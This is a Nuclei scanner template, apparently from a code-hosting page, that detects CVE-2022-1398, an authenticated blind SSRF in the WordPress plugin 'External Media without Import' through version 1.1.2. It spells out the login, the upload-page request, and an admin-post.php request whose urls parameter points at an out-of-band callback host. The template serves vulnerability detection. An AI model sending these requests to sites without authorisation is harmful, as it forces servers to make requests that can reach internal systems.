54 lines
1.7 KiB
YAML
54 lines
1.7 KiB
YAML
id: CVE-2022-1398
|
|
|
|
info:
|
|
name: External Media without Import <= 1.1.2 - Authenticated Blind SSRF
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
The External Media without Import WordPress plugin through 1.1.2 does not have any authorization and does not ensure that media added via URLs are external media, which could allow any authenticated users (including subscriber) to perform blind SSRF attacks.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e
|
|
- https://wordpress.org/plugins/external-media-without-import/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1398
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2022-1398
|
|
cwe-id: CWE-981
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
GET /wp-admin/upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /wp-admin/admin-post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
urls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "external-media-without-import"
|